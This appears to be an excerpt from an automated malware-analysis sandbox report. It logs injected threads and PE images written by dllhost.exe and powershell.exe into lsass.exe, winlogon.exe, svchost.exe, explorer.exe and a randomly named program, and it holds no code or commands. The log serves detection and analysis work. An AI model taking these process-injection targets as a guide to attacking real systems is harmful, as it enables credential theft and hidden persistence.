Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2B925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2E125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DB25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: CC522EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: CC552EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 65092EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F0522EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\Conhost.exe EIP: 15D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F2842EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2E612EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2E642EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\Conhost.exe EIP: D6712EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 37402EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E3D52EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FE072EBC

Injects a PE file into a foreign processes

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dwm.exe base: 2BAAED80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dwm.exe base: 2BAAEDB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1845B390000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1845B3C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1ADECD70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D559040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D559070000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21B47B30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 20870060000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 17184260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23FD3FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D2A4150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D2A4180000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B5645B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\spoolsv.exe base: 1990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B5645B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\spoolsv.exe base: 1990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2108BCF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 29166900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13FF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1988D570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 13869B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E1CC740000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2108BCF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2855DA70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 29166900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13FF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1988D570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 13869B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\sihost.exe base: 1CD40E40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 151A6530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 19E27BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2252F480000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 151A6530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 19E27BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 184683D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\explorer.exe base: 32F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1972E260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2252F480000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 221D5930000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 184683D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\explorer.exe base: 32F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1972E260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D1777C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D1777C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DAC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F560310000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 195E2530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 195E2560000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21C4C590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21C4C5C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 18DCC7D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 18DCCA00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dllhost.exe base: 14D83F10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dllhost.exe base: 14D83F40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 1B927020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 1B927050000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2DE31080000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2DE310B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 800000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 14C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 14E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: C00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: E30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: E50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1250000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1270000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 12B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 12D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 6D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 6F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 920000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 3B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 3D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 9B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: AD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: AF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: CF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: D10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1470000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 380000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 15B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 15D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: E50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 9B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 9D0000 value starts with: 4D5A
